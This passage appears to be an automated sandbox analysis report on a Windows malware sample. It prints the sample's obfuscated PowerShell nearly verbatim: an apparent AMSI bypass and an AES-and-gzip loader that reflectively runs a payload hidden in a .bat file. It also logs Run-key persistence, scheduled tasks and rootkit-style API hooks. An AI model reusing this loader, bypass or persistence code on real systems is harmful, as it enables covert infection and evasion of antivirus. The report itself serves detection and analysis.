Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: 7\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbpl source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Management.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Core.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdbx*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Transactions.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($HcKZyefBJpvKrT,$DyGxdRsDFLitOyBSDtJ).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$IPJIfzrUhQjJlmTUH=$YOhLAkBIOfDYUh.Invoke(
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+'T'+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+[Char](120)+''+[Char](45)+'s'+
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[C
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111
)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[C
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC401E3C LoadLibraryA,GetProcAddress,SleepEx, 17_2_00000253FC401E3C
Source: C:\Windows\System32\cmd.exe Code function: 17_3_00000253FC3EA7DD push rcx; retf 003Fh 17_3_00000253FC3EA7DE
Source: C:\Windows\System32\conhost.exe Code function: 18_3_000002A5AF34A7DD push rcx; retf 003Fh 18_3_000002A5AF34A7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343E00BD pushad ; iretd 36_2_00007FFD343E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343E63D1 push ebx; retf 0009h 36_2_00007FFD343E642A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EB05C push esp; retf 36_2_00007FFD343EB05D
Source: C:\Windows\System32\conhost.exe Code function: 37_3_000001780D3FA7DD push rcx; retf 003Fh 37_3_000001780D3FA7DE
Source: C:\Windows\System32\dllhost.exe Code function: 38_3_0000020175E9A7DD push rcx; retf 003Fh 38_3_0000020175E9A7DE
Source: C:\Windows\System32\winlogon.exe Code function: 39_3_000002D01659A7DD push rcx; retf 003Fh 39_3_000002D01659A7DE

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$rbx-FHOIapsb

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: winlogon.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
